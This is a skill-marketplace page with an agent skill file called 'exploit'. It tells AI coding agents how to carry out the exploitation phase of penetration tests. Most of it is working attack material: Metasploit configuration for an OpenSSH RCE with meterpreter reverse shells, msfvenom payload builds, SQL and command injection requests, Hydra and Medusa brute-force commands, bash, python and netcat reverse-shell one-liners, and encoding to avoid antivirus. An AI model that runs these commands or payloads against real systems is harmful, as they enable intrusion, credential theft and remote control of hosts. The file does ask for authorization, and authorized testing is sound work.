duriandurino/exploit
exploit/SKILL.md
Exploitation framework for penetration testing — Metasploit, public exploits, and manual exploitation. Use when: user asks to exploit a vulnerability, get a shell on a target, run an exploit for a CVE, gain access, compromise a host, attempt exploitation, or deliver a payload. This is the attack phase — systems may be affected. NOT for: vulnerability analysis (use vuln skill), scanning (use enum skill), or post-exploitation (use post skill).
development
Updated Apr 15, 2026
$ install --global
skillsauthnpx skillsauth add duriandurino/openclawrino exploitInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 15, 2026, 5:23 PM25.8s4 files scanned
SKILL.md
- name:
- exploit
- description:
- Exploitation framework for penetration testing — Metasploit, public exploits, and manual exploitation. Use when: user asks to exploit a vulnerability, get a shell on a target, run an exploit for a CVE, gain access, compromise a host, attempt exploitation, or deliver a payload. This is the attack phase — systems may be affected. NOT for: vulnerability analysis (use vuln skill), scanning (use enum skill), or post-exploitation (use post skill).
- metadata:
- { "openclaw": { "emoji": "💀", "requires": { "bins": ["msfconsole", "msfvenom"] } } }
Exploitation Skill
Execute exploits against confirmed vulnerabilities. Confirm authorization before any exploitation.
When to Use
✅ USE this skill when:
- "Exploit this vulnerability"
- "Get a shell on 192.168.1.105"
- "Run the Metasploit module for CVE-2024-6387"
- "Try to gain access using the exploit we found"
- "Deliver a payload to this target"
- "Use the public exploit for this CVE"
- "Compromise this service"
When NOT to Use
❌ DON'T use this skill when:
- Still analyzing vulnerabilities → use vuln skill
- Need a shell after exploitation → use post skill
- Haven't confirmed the vulnerability exists → use vuln skill first
- No authorization to exploit → STOP and confirm scope
⚠️ Authorization & Safety
Before any exploitation:
- Confirm target is in authorized scope
- Confirm written authorization exists
- Understand what could break (this is the destructive phase)
- Have a rollback plan for critical targets
- Document everything for the report
Raspberry Pi 5B note: Physical access is in scope. USB/HDMI/GPIO attacks may affect the device state. Document before/after state.
Exploitation Workflow
Step 1 — Select Exploit
From vuln analysis findings:
# Search Metasploit for matching module
msfconsole -q -x "search cve:2024-6387; exit"
# Or search by service
msfconsole -q -x "search type:exploit name:openssh; exit"
Step 2 — Configure & Run
# Launch msfconsole
msfconsole -q
# Select exploit
use exploit/linux/ssh/regreSSHion_rce
# Set target
set RHOSTS 192.168.1.105
set RPORT 22
# Set payload
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
# Run
exploit
Step 3 — Verify Access
# Check if we got a shell
whoami
id
hostname
Metasploit Command Reference
# Start
msfconsole -q
# Search modules
search cve:2024-6387
search type:exploit name:openssh
search type:auxiliary name:smb
# Use module
use exploit/linux/ssh/regreSSHion_rce
# Configure
show options
set RHOSTS 192.168.1.105
set RPORT 22
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
show targets
set TARGET 0
# Run
exploit -j # Background job
exploit # Foreground
# Sessions
sessions -l # List sessions
sessions -i 1 # Interact with session 1
sessions -k 1 # Kill session 1
# Generate payloads (standalone)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o payload.elf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o payload.exe
msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o payload.php
Manual Exploitation
When Metasploit doesn't have a module:
Public Exploits (from searchsploit)
# Find and download exploit
searchsploit openssh 8.2
searchsploit -m 49757 # Mirror to current dir
# Review exploit code before running
cat 49757.py
# NEVER run exploits blindly — understand what they do
# Execute
python3 49757.py 192.168.1.105 22
Web Exploits
# SQL injection (manual)
curl -s "http://target/login.php?user=admin'--"
# Command injection
curl -s "http://target/ping.php?ip=127.0.0.1;id"
# File upload bypass
curl -F "[email protected]" http://target/upload.php
Password Attacks
# Hydra brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.105
# Hydra FTP
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.105
# Medusa
medusa -h 192.168.1.105 -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
Reverse Shell One-liners
# Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <IP> <PORT> > /tmp/f
Payload Selection Guide
| Scenario | Payload |
|----------|---------|
| Linux target, need stable shell | linux/x64/meterpreter/reverse_tcp |
| Linux target, quick check | linux/x64/shell_reverse_tcp |
| Windows target | windows/x64/meterpreter/reverse_tcp |
| PHP web shell | php/meterpreter_reverse_tcp |
| One-liner, no file | linux/x64/shell_reverse_tcp (stageless) |
| Encoded (avoids basic AV) | linux/x64/meterpreter/reverse_tcp + encoder |
Listener Setup (for reverse shells)
# Metasploit handler
msfconsole -q -x "
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit -j
"
# Simple netcat listener
nc -lvnp 4444
# rlwrap for better shell
rlwrap nc -lvnp 4444
Documentation
Save exploitation results to engagements/<target>/exploit/ following the workspace engagement structure. The orchestrator will specify the target name. Preserve original filenames. NEVER create ad-hoc directories.
- Which exploit was used
- Whether it succeeded
- Access level obtained (user/root/shell type)
- Evidence (screenshots, output)
- Any issues encountered
Related Skills
duriandurino/vuln
testing
VerifiedTrustedCommunity
Vulnerability analysis and CVE matching for penetration testing. Use when: user asks to check for vulnerabilities, match CVEs against service versions, analyze scan results for weaknesses, research exploitability, assess risk of discovered services, or identify known vulnerabilities. This is the analysis phase — no exploitation yet. NOT for: active scanning (use enum skill), exploitation (use exploit skill), or post-exploitation (use post skill).
SKILL.mdUpdated Apr 15, 2026
duriandurino/vuln-phase-essentials
development
VerifiedTrustedCommunity
Methodology and decision framework for the penetration testing vulnerability phase. Use when: validating scanner output, distinguishing confirmed vulnerabilities from hypotheses, explaining CVE/CWE/CVSS, prioritizing findings with KEV/EPSS/business context, guiding vuln-analysis workflow, or reinforcing evidence-backed reporting during the vulnerability phase. NOT for: initial recon or active enumeration, hands-on exploitation, post-exploitation, or replacing the specialized vuln skill's concrete checks.
SKILL.mdUpdated Apr 15, 2026
duriandurino/slides-cog
development
VerifiedTrustedCommunity
Great slides need two things: content worth presenting and design worth looking at. #1 on DeepResearch Bench (Feb 2026) — CellCog researches and fills content mindfully from minimal prompts, no filler. State-of-the-art PDF generation for presentations, pitch decks, keynotes, and slideshows you can present as-is. Requires cellcog skill for SDK. If cellcog is unavailable, use gog slides as fallback (Google Workspace).
SKILL.mdUpdated Apr 15, 2026
duriandurino/report-phase-essentials
development
VerifiedTrustedCommunity
Methodology and quality framework for the penetration testing report phase. Use when: writing or QA-ing pentest reports, improving executive and technical readability, enforcing evidence completeness, adding remediation and retest guidance, including cleanup/restoration and residual risk, or securing report packaging and delivery. NOT for: running phase-specific testing tasks or replacing the specialized reporting implementation/publishing workflow.
SKILL.mdUpdated Apr 15, 2026